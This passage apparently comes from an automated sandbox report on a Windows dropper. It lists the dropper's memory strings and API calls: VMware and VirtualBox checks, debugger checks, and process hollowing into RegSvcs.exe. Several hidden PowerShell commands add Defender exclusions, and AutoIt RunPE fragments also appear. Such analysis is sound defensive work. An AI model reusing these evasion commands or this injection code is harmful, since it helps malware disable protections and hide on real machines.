                          Source: sdadbtvsh.bin, 00000008.00000003.1599977444.000000000173F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe/
                          Source: sdadbtvsh.bin, 00000008.00000003.1599039739.0000000001739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe&Zo
                          Source: sdadbtvsh.bin.exe, 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                          Source: nngqrvwq.xl.8.drBinary or memory string: If ProcessExists("VboxService.exe") Then
                          Source: sdadbtvsh.bin.exe, 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then60
                          Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1599039739.0000000001739000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1747808847.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1741924175.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745908071.0000000000DE5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2208566805.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
                          Source: sdadbtvsh.bin.exe, 00000023.00000003.2208566805.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exeS
                          Source: sdadbtvsh.bin.exe, 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                          Source: sdadbtvsh.bin.exe, 0000001A.00000003.1953788447.00000000015A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenMY
                          Source: sdadbtvsh.bin.exe, 0000001A.00000003.1953788447.00000000015A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then60
                          Source: sdadbtvsh.bin.exe, 0000001A.00000003.1954957526.00000000015EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exeZ
                          Source: sdadbtvsh.bin.exe, 0000001A.00000003.1954957526.00000000015EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
                          Source: sdadbtvsh.bin.exe, 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Theni
                          Source: sdadbtvsh.bin.exe, 00000023.00000003.2209677560.000000000173F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000002.2210405778.0000000001742000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then0.V
                          Source: sdadbtvsh.bin.exe, 00000014.00000002.1753337801.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1752343208.0000000000D8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                          Source: nngqrvwq.xl.0.dr, nngqrvwq.xl.8.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                          Source: C:\Users\user\Desktop\PO3311926.exeAPI call chain: ExitProcess graph end nodegraph_0-23785
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0EE33800 LdrInitializeThunk,15_2_0EE33800
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_0060F3FF BlockInput,8_2_0060F3FF
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BBF838
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_00595D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00595D78
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BC7DEE mov eax, dword ptr fs:[00000030h]0_2_00BC7DEE
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B5078 mov eax, dword ptr fs:[00000030h]8_2_005B5078
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A85078 mov eax, dword ptr fs:[00000030h]20_2_00A85078
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BCC030 GetProcessHeap,0_2_00BCC030
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BBF838
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BBF9D5 SetUnhandledExceptionFilter,0_2_00BBF9D5
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BBFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BBFBCA
                          Source: C:\Users\user\Desktop\PO3311926.exeCode function: 0_2_00BC8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BC8EBD
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005C29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_005C29B2
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_005B0BCF
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B0D65 SetUnhandledExceptionFilter,8_2_005B0D65
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005B0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_005B0FB1
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A929B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00A929B2
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A80BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00A80BCF
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A80D65 SetUnhandledExceptionFilter,20_2_00A80D65
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeCode function: 20_2_00A80FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00A80FB1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1340000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1300000 protect: page execute and read and write
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DA0000 protect: page execute and read and write
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1340000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1300000 value starts with: 4D5A
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DA0000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1340000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1053000Jump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000Jump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3FB000Jump to behavior
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1300000
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1130000
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DA0000
                          Source: C:\Users\user\wrse\sdadbtvsh.bin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A0A000
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_005F1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,8_2_005F1A91
                          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.binCode function: 8_2_00593312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,8_2_00593312
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")o7memstr_db719c70-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc:/memstr_52d311fb-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifwtmemstr_1adea4ad-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)memstr_48a30753-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)ckbmemstr_7865dfaf-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)9hhmemstr_a469d4bb-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)5zmemstr_d316f5f9-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)admemstr_fa9672a1-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($var94, 1, "current_user")a(memstr_f885897a-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($binbuffer, 1, $binary)memstr_2b5dc15c-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 877b273kmemstr_ccf5875e-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($var93, 1, "0x401fffff")}(memstr_4ec5496e-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $ppointer = dllstructgetptr($tbinary)memstr_bdc18e6f-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $idata = dllstructgetdata($tenries, 1, $i)memstr_a2719535-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func _runbinary_iswow64process($handlerpro)memstr_f2894a66-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ppeb = dllstructgetdata($tcontext, "ebx")memstr_ddfa9af3-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ppeb = dllstructgetdata($tcontext, "rdx")memstr_4b39e8ef-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error then return seterror(3, 0, false)memstr_a9cd552d-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $idelta = $paddressnew - $paddressoldmemstr_9f8e7e91-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $inumberofentries = ($isizeofblock - 8) / 2memstr_a6350ff9-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $ssssss = stringreplace($ssssss, "/", "0")memstr_b71ffba6-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2y$5)memstr_42e24c29-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $isizeofrawdata, $ppointertorawdatajwomemstr_7347109e-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $pmodule = dllstructgetptr($tmodule)memstr_9ba38748-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 029mujyu56dqv8iye)<memstr_aaf46e8f-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1l68fhh2nt3yvw9kku4fnp2memstr_f0264e07-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: okab6221132e57hr423memstr_16c221f0-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zf43tpn47s51o5454d6memstr_3e6806b2-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 882t0k54i8t9ai5a)memstr_27b11c54-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0a8yy0hflh848qgmemstr_dd5cfb6c-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 332kememstr_4d7a73e7-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k763139foz4_)memstr_9d23a726-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9r9b5quscc091oj0k23memstr_854f03b9-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5637s4z0o52bvt5u)memstr_94ea1ef3-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $tenries, $idata, $taddress51memstr_224a0319-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $iflag = 3 + 7 * $fimagex64oymemstr_d69592a3-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zd^}hmemstr_6a162025-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i)"k?memstr_1bb8f79a-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: td00133memstr_1b950a3e-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cyx04n6ph39ikt68jl5obfa47w4memstr_cbeae223-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5p69k4zs5adqmmemstr_6320f77b-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~n.a@memstr_c859f5f1-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sq8hx3s2n81memstr_92d937b8-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b1t5uumemstr_8ffeddff-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7o2a89423m035xwncaz6uebu05ovgy454k2vmemstr_78d0121f-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $var106 = dllstructgetptr($var93)memstr_a4d413c7-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $var108 = dllstructgetptr($var95)memstr_509da4ca-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $i = 1 to $inumberofsectionse9memstr_fcafe5cf-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or $acall[0] = -1 thenmemstr_73efa1ad-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func __runpe($binary, $sexemodule)memstr_a84fb245-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kgjjx8k1rj45*memstr_359486ee-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0jv4a145f3j6t12qjlq0g7dob790ffmemstr_55cf6d1c-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 29563ie7t2142u6memstr_00c957ae-3
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __runpe($bbinaryimage, $sexemodule)memstr_6b023c3f-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3^lm*#memstr_a7880254-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'ke5rmemstr_695c8843-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($var93, 6, "1")'memstr_08559960-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 58a05f85vrqpzyc70uhllmemstr_1f220191-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($var93, 7, "0")memstr_85ce0bbb-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^kaxr%dmemstr_9728b166-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kiqs*memstr_4a8dbbfb-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0x40fdh57of7cramemstr_84ed0d66-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g61a0z6b9gbmemstr_afd6d3fd-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0xs0691ov5oonqn86m456l139x0memstr_2aef0417-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 864rodtmemstr_b7fa1220-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i@-?u\memstr_952ea3f6-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t1c'memstr_c583d097-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4itb9a3497r8wkymemstr_97a3b755-e
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f08s6n9478yz7xmemstr_514e286f-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osq^fmemstr_59ba1039-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $var110 = dllcall("advapi32.dll", "dword", "setentriesinacla", "ulong", "1", "ptr", $var106, "ptr", "0", "ptr", $var108)memstr_e62aa5b4-8
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $var113 = dllcall("advapi32.dll", "dword", "setsecurityinfo", "handle", $var92, "int", "6", "dword", "0x00000004", "dword", "0", "dword", "0", "ptr", dllstructgetdata($var95, 1), "ptr", 0)memstr_df0d5134-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if not ubound($var110) then return seterror(4, 0, false)memstr_1210144c-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if not ubound($var113) then return seterror(5, 0, false)memstr_a6084d8e-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($tmodule, 1, dllstructgetdata($theaders, 1))/$memstr_9b44293f-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $smagic = dllstructgetdata($timage_dos_header, "magic")memstr_357ad393-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if $var110[0] <> 0 then return seterror(6, $var110[0], false)a$umemstr_e2253d7a-4
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if $var113[0] <> 0 then return seterror(7, $var113[0], false)memstr_531db188-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if $fautoitx64 and _runbinary_iswow64process($handlerpro) thens%cmemstr_feebff9f-a
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t`xvpmemstr_afdcca5e-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hl0vpmemstr_9f486204-f
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~pxpmemstr_07ece005-7
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =ghvpmemstr_971b4a7e-c
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endifl&_memstr_2ed38096-9
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: elseq&dmemstr_7f575c80-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^v`vpmemstr_156ece7b-b
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #pwpmemstr_5b87c7e3-d
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 1memstr_a4c3253c-0
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 2memstr_51481cb9-2
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 3memstr_cebd67c4-1
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif('memstr_f6f04665-6
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif/'memstr_f6f5119e-5
                          Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: case 3$'memstr_9b07f697-c
